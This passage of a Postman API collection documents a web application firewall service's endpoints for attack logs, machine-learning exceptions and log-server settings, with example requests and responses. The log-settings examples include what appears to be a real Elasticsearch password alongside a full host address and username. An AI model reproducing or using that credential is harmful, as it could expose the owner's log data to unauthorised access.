value shall be less than 10000/size. For example, if the size is 100, then page number shall not exceed 100.</p>\n","type":"text/plain"},"key":"page","value":"{{page}}"},{"description":{"content":"<p>Array like string. Each element shall be JSON like object. \nBasic structure is [{\"id\":\"{log_field_name}\",\"logic\":{\"is\":{\"string\":true},\"NOT\":{1 or None},\"RANGE\":{1 or None} },\"value\":[\"{field_value_1}\", \"field_value_2\"]}]. \nAdd NOT:1 to exclude given values. Add RANGE:1 to tell that the given filter value is range type (at least two values). Value is an array containing multiple values. The logic between these values is OR logic.</p>\n","type":"text/plain"},"key":"filter","value":"{{filter}}"}],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"6694dec8-52a0-48ef-a969-a84be9bcb1fa","name":"GetAttackLogsList","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/attack_logs?size={{size}}&page={{page}}&filter={{filter}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","attack_logs"],"query":[{"key":"size","value":"{{size}}","description":"Integer. Log numbers in one page. Maximum value is 100."},{"key":"page","value":"{{page}}","description":"Integer. Page number. Value should be less than 10000/size. For example, if size is 100, then page number should not exceed 100."},{"key":"filter","value":"{{filter}}","description":"Array like string. Each element should be JSON like object. Basic structure is [{\"id\":\"{log_field_name}\",\"logic\":{\"is\":{\"string\":true},\"NOT\":{1 or None},\"RANGE\":{1 or None} },\"value\":[\"{field_value_1}\", \"field_value_2\"]}]. \nAdd NOT:1 to exclude given values. Add RANGE:1 to tell that the given filter value is range type(must be two values). Values is an array contain multiple values. The logic between these values is OR logic."}],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 05 Jun 2019 09:54:16 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"5828"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"e1318e18-8777-11e9-9da0-ad40de55eb00"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"azOjQHrmoAMFswQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf79148-7c0ecec9dbb26f9df1a9a755;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"total\": 10813922,\n    \"max_score\": null,\n    \"hits\": [\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:02-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649569\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:02-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649569\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:02-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649569\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:02-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649568\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:02-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649568\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:02-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649568\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:02-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649567\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:02-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649567\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:02-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649567\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:02-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649566\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:02-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649566\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:02-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649566\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:02-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649565\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:02-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649565\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:02-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649565\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:02-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649564\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:02-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649564\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:02-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649564\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:01-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649563\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        },\n        {\n            \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n            \"src_ip\": \"10.0.1.24\",\n            \"threat_level\": \"Low\",\n            \"date_time\": \"2019-04-08T13:58:01-05:00\",\n            \"action\": \"Monitor\",\n            \"msg_id\": \"000007649563\",\n            \"country_flag\": \"RESERVED\",\n            \"http_url\": \"/index_50000bytes.html\"\n        }\n    ]\n}"}],"_postman_id":"82df24e9-5c38-4696-8949-a108e7508b07"},{"name":"Get Attack Log Detail","id":"ab1736dd-7c83-4480-982b-3e78d0eafb42","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/attack_logs/:msg_id","description":"<p>Get the information of attack log details.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","attack_logs",":msg_id"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"},{"description":{"content":"<p>Message ID in log which is used to identify the log entity</p>\n","type":"text/plain"},"type":"string","value":"{{msg_id}}","key":"msg_id"}]}},"response":[{"id":"91575821-f15a-47fd-80e0-7767814b8cf3","name":"GetAttackLogDetail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/attack_logs/:msg_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","attack_logs",":msg_id"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"String. The application ID"},{"key":"msg_id","value":"{{msg_id}}","description":"String. Message ID in log which could be used to identify log entity."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 05 Jun 2019 09:58:13 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"5265"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"6e01d581-8778-11e9-b2fd-fb92289fb034"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"azPIKFLpoAMFsoA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf79234-be41840024652a99fe093200;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"log_id\": \"20000201\",\n    \"msg_id\": \"000010710768\",\n    \"service\": \"http\",\n    \"http_version\": \"1.x\",\n    \"action\": \"Erase\",\n    \"src_port\": \"10276\",\n    \"dst_port\": \"80\",\n    \"http_url\": \"/index_50000bytes.html\",\n    \"http_host\": \"www.cnbeta.com\",\n    \"http_agent\": \"Firefox/41.0\",\n    \"msg\": \"Information Leakage: Server Information Disclosure violation in HTTP Header\",\n    \"signature_id\": \"080200001\",\n    \"signature_cve_id\": \"N/A\",\n    \"owasp_top10\": \"A3:2017-Sensitive Data Exposure\",\n    \"country_flag\": \"RESERVED\",\n    \"srccountry\": \"Reserved\",\n    \"http_refer\": \"none\",\n    \"main_type\": \"Information Leakage\",\n    \"sub_type\": \"Server Information Disclosure\",\n    \"threat_level\": \"Low\",\n    \"threat_weight\": \"5\",\n    \"backend_service\": \"http\",\n    \"packet\": {\n        \"pattern\": \"Server: nginx/1.9.5\\r\",\n        \"packet\": \"FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT FTNT F\",\n        \"match_info\": \"1\",\n        \"head\": {\n            \"HTTP/1.1 \": \"200 OK\",\n            \"Content-Length:\": \"50000\",\n            \"Server:\": \"nginx/1.9.5\",\n            \"Content-Type:\": \"text/html\"\n        },\n        \"args\": [],\n        \"cookies\": [],\n        \"files\": []\n    },\n    \"ml_log_arglen\": \"22\",\n\t\"ml_log_hmm_probability\": \"400.000000\",\n\t\"ml_log_sample_arglen_mean\": \"2.236541\",\n\t\"ml_log_sample_prob_mean\": \"1.065873\",\n\t\"ml_svm_accuracy\": \"1:7,2:0,3:0,4:0,5:0,6:0,7:0\",\n\t\"ml_svm_log_main_types\": \"1\",\n\t\"ml_svm_log_match_types\": \"1\",\n    \"length\": 1404,\n    \"src_ip\": \"10.0.1.24\",\n    \"cluster_id\": 1,\n    \"instance_id\": \"i-09a8e9a10c4fcacaf\",\n    \"http_method\": \"GET\",\n    \"policy_name\": \"8820359252_www_cnbeta_com\",\n    \"ep_id\": \"8820359252\",\n    \"ep_domain\": \"www_cnbeta_com\",\n    \"user_id\": \"769544\",\n    \"ep_region\": \"us-east-1\",\n    \"date_time\": \"2019-04-15T03:06:26-05:00\"\n}"}],"_postman_id":"ab1736dd-7c83-4480-982b-3e78d0eafb42"},{"name":"Update Machine Learning Exception","id":"dee34608-b25d-41f7-92f1-5f68738fcacb","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n\t\"action\":1,\n\t\"domain_id\":\"87\",\n\t\"url_id\":\"2\",\n\t\"arg_id\":\"3\",\n\t\"sample_id\":\"123#\"\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/mlargexception","description":"<p>Add Machine Learning exception rule based on the log detail information.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"action\": {\n            \"description\": \"The type of the operation, 0 for 'check', and 1 for 'add'\",\n            \"type\": \"integer\",\n            \"enum\": [0, 1]\n        },\n        \"domain_id\": {\n            \"description\": \"The domain ID of the target to be operated\",\n            \"type\": \"string\"\n        },\n        \"url_id\": {\n            \"description\": \"The URL ID of the domain\",\n            \"type\": \"string\"\n        },\n        \"arg_id\": {\n            \"description\": \"The argument ID of the URL\",\n            \"type\": \"string\"\n        },\n        \"sample_id\": {\n            \"description\": \"The content of the argument\",\n            \"type\": \"string\"\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","mlargexception"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"2d4bb849-2b91-443f-bb64-49407167a3e6","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"action\":1,\n\t\"domain_id\":\"87\",\n\t\"url_id\":\"2\",\n\t\"arg_id\":\"3\",\n\t\"sample_id\":\"123#\"\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/mlargexception","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","mlargexception"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:38:42 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"47"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"c661781a-869b-11e9-b96f-a7a1d2c8a45d"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avnwRFQ7oAMFRXQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf62001-a754a59a5f3e6a7b759b695c;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n\t\"detail\": \"successfully\"\n}"},{"id":"a9a5ba64-1764-4239-b5a7-3e50d1f9100d","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n\t\"action\":1,\n\t\"domain_id\":\"87\",\n\t\"url_id\":\"2\",\n\t\"arg_id\":\"3\",\n\t\"sample_id\":\"123#\"\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/mlargexception","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","mlargexception"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:39:26 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"e120b283-869b-11e9-848f-1d541ed7c3fd"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avn3SE3koAMF_hQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"dee34608-b25d-41f7-92f1-5f68738fcacb"},{"name":"Get Log Settings","id":"b0d4bfb0-c0b0-41af-93bb-2fead37c7c19","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/log-setting","description":"<p>Get endpoint log server configuration.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","log-setting"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"100b423e-cef1-4f05-bafa-269e092644e2","name":"Success","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/log-setting","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","log-setting"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n\t\"attackCfg\": {\n    \t\"_status\": \"enable\",\n\t    \"syslog-setting\": {\n\t    \t\"elasticAlog\": {\n\t    \t\t\"password\": \"suFdYOFiU7FuFfBxoN2gHcuA\",\n\t    \t\t\"address\": \"f459405714614c5a8624bdc20f1180b1.ap-southeast-1.aws.found.io\",\n\t    \t\t\"syslog_type\": \"alog\",\n\t    \t\t\"port\": 9243,\n\t    \t\t\"user_id\": \"bba91d22-ca28-11e9-b785-2e109146634c\",\n\t    \t\t\"ep_id\": \"5610756959\",\n\t    \t\t\"server_type\": \"elasticsearch\",\n\t    \t\t\"username\": \"elastic\"\n\t    \t},\n\t        \"syslog-server-name\": {\n\t            \"severity\": \"2222\",\n\t            \"address\": \"1.1.1.1\",\n\t            \"pkey_passwd\": \"123456\",\n\t            \"create_time\": \"2019-07-01 02:46:15.208876\",\n\t            \"cert_signed\": 0,\n\t            \"cert\": \"cert content\",\n\t            \"type\": \"attack\",\n\t            \"ep_id\": \"9148333272\",\n\t            \"protocol\": \"TCP\",\n\t            \"port\": 512,\n\t            \"server_type\": \"syslog\",\n\t            \"syslog_type\": \"alog\",\n\t            \"user_id\": \"zhaoxin@example.com\",\n\t            \"pkey\": \"key content\",\n\t            \"value\": \"xxxx\",\n\t            \"facility\": \"1111\"\n\t        }\n\t    }\n\t},\n    \"enableAlarm\": true,\n\t\"alarmMode\": \"advanced\",\n\t\"basicRule\": {\n\t\t\"customNotified\": false,\n\t    \"name\": \"Basic Alarm\",\n\t    \"threshold\": \"Critical\",\n\t    \"defaultNotified\": \"user@example.com\",\n\t    \"notified\": null\n\t},\n\t\"advancedRules\": [{\n\t\t\"customNotified\": true,\n\t\t\"notified\": \"user2@example.com\",\n\t    \"name\": \"demo_rule_3\",\n\t    \"threshold\": 800,\n\t    \"filters\": [{\n\t    \t\"field\": \"main_type\",\n\t        \"value\": \"Known Attacks\",\n\t        \"operator\": \"is_not\"\n\t    }],\n\t    \"enabled\": true\n\t}, {\n\t\t\"customNotified\": false,\n\t    \"notified\": null,\n\t    \"name\": \"demo_rule_2\",\n\t    \"threshold\": 200,\n\t    \"filters\": [ {\n\t    \t\"field\": \"src_ip\",\n\t        \"startValue\": \"2.2.2.2\",\n\t        \"endValue\": \"2.2.2.240\",\n\t        \"operator\": \"is_between\"\n\t    } ],\n\t    \"enabled\": true,\n\t    \"defaultNotified\": \"user@example.com\"\n\t}, {\n\t\t\"customNotified\": false,\n\t    \"notified\": null,\n\t    \"name\": \"demo_rule_1\",\n\t    \"threshold\": 1000,\n\t    \"filters\": [ {\n\t    \t\"field\": \"http_agent\",\n\t        \"value\": \"chrome\",\n\t        \"operator\": \"is\"\n\t    }],\n\t    \"enabled\": false,\n\t    \"defaultNotified\": \"user@example.com\"\n   }],\n    \"logMaskRules\": [\n        {\n            \"rule_type\": \"URL\",\n            \"name_pattern\": \"\",\n            \"value_pattern\": \"password=.*\"\n        },\n        {\n            \"rule_type\": \"Parameter\",\n            \"name_pattern\": \"password\",\n            \"value_pattern\": \".*\"\n        },\n        {\n            \"rule_type\": \"Cookie\",\n            \"name_pattern\": \"password\",\n            \"value_pattern\": \".*\"\n        }\n    ],\n    \"logstash_traffic_config\": {\n        \"user_secret_key\": \"xxx\",\n        \"user_bucket_name\": \"bucket-name-example\",\n        \"user_access_id\": \"xxx\",\n        \"user_prefix\": \"prefix-example\",\n        \"_status\": \"enable\",\n        \"user_account_region\": \"us-west-2\",\n        \"server_type\": \"S3\"\n    }\n}\n"},{"id":"64c56c39-b26f-4796-903f-ac0f69be0f25","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/log-setting","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","log-setting"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Failed to get Logs Settings.\"\n}"}],"_postman_id":"b0d4bfb0-c0b0-41af-93bb-2fead37c7c19"},{"name":"Update Log Settings","id":"1a089701-6d3f-490d-9cde-5e3ed65e8929","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n\t\"attackCfg\": {\n\t    \"_status\": \"enable\",\n\t    \"endpoint-setting\": {\n\t    \t\"syslog-server-name\": {\n\t    \t\t\"address\": \"1.1.1.1\",\n\t    \t\t\"port\": 512,\n\t    \t\t\"protocol\": \"TCP\",\n\t    \t\t\"cert_signed\": 0,\n\t    \t\t\"cert\": \"cert content\",\n\t    \t\t\"pkey\": \"key content\",\n\t    \t\t\"pkey_passwd\": \"123456\",\n\t    \t\t\"type\": \"default\",\n\t    \t\t\"value\": \"cat=attack date_time={{dt}} user_id={{uid}} ep_id={{eid}} app_name={{an}} ep_region={{er}} ep_domain={{ed}} src_ip={{si}} src_port={{sp}} backend_service={{bs}} dst_port={{dp}} srccountry={{sc}} service={{svc}} action={{act}} main_type={{mt}} sub_type={{st}} threat_level={{tl}} threat_weight={{tw}} http_host={{hh}} http_url={{hu}} http_version={{hv}} http_method={{hm}} http_agent={{ha}} http_refer={{hr}} length={{lt}} signature_id={{sid}} signature_cve_id={{sci}} owasp_top10={{ott}} msg={{msg}}\",\n\t    \t\t\"facility\": \"local1\",\n\t    \t\t\"severity\": \"Critical\",\n\t    \t\t\"server_type\": \"syslog\",\n\t    \t\t\"syslog_type\": \"alog\"\n\t    \t},\n\t\t\t\"elastic-server-name\": {\n\t\t\t\t\"server_type\": \"elasticsearch\",\n\t\t\t\t\"syslog_type\": \"alog\",\n\t\t\t\t\"address\":\"f459405714614c5a8624bdc20f1180b1.ap-southeast-1.aws.found.io\",\n\t\t\t\t\"port\": 9243,\n\t\t\t\t\"username\":\"elastic\",\n\t\t\t\t\"password\": \"suFdYOFiU7FuFfBxoN2gHcuA\",\n\t\t\t\t\"user_id\":\"bba91d22-ca28-11e9-b785-2e109146634c\",\n\t\t\t\t\"ep_id\":\"5610756959\"\n\t\t\t}\n\t    }\n\t},\n    \"enableAlarm\": true,\n\t\"alarmMode\": \"basic\",\n\t\"basicRule\": {\n\t\t\"customNotified\": true,\n\t    \"name\": \"Basic Alarm\",\n\t    \"threshold\": \"Critical\",\n\t    \"notified\": \"user@demo.com\"\n\t},\n\t\"advancedRules\": [{\n\t\t\"customNotified\": true,\n\t\t\"notified\": \"user2@example.com\",\n\t    \"name\": \"demo_rule_3\",\n\t    \"threshold\": 800,\n\t    \"filters\": [{\n\t    \t\"field\": \"main_type\",\n\t        \"value\": \"Known Attacks\",\n\t        \"operator\": \"is_not\"\n\t    }],\n\t    \"enabled\": true\n\t}, {\n\t\t\"customNotified\": false,\n\t    \"notified\": null,\n\t    \"name\": \"demo_rule_2\",\n\t    \"threshold\": 200,\n\t    \"filters\": [ {\n\t    \t\"field\": \"src_ip\",\n\t        \"startValue\": \"2.2.2.2\",\n\t        \"endValue\": \"2.2.2.240\",\n\t        \"operator\": \"is_not_between\"\n\t    } ],\n\t    \"enabled\": true,\n\t    \"defaultNotified\": \"user@example.com\"\n\t}, {\n\t\t\"customNotified\": false,\n\t    \"notified\": null,\n\t    \"name\": \"demo_rule_1\",\n\t    \"threshold\": 1000,\n\t    \"filters\": [ {\n\t    \t\"field\": \"http_agent\",\n\t        \"value\": \"chrome\",\n\t        \"operator\": \"is\"\n\t    }],\n\t    \"enabled\": false,\n\t    \"defaultNotified\": \"user@example.com\"\n   }],\n    \"logstash_traffic_config\": {\n        \"user_secret_key\":\"xxxxx\",\n        \"user_bucket_name\":\"user_bucket_name\",\n        \"user_access_id\":\"xxx\",\n        \"user_prefix\":\"user_prefix\",\n        \"_status\":\"enable\",\n        \"user_account_region\":\"us-west-2\",\n        \"server_type\":\"S3\"\n    }\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/log-setting","description":"<p>Update log server configuration.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"required\": [\"_status\"],\n    \"properties\": {\n        \"attack_cfg\": {\n            \"_status\": {\n                \"description\": \"Configure to enable or disable syslog server\",\n                \"type\": \"string\",\n                \"enum\": [\"enable\", \"disable\"],\n                \"default\": \"disable\"\n            },\n            \"syslog-settings\": {\n                \"description\": \"The syslog server dict\",\n                \"type\": \"object\",\n                \"maxItem\": 5,\n                \"syslog-server-name\": {\n                    \"type\": \"object\",\n                    \"required\": [\"server_type\", \"syslog_type\", \"address\", \"port\", \"protocol\", \"cert_signed\", \"type\", \"value\"],\n                    \"properties\": {\n                        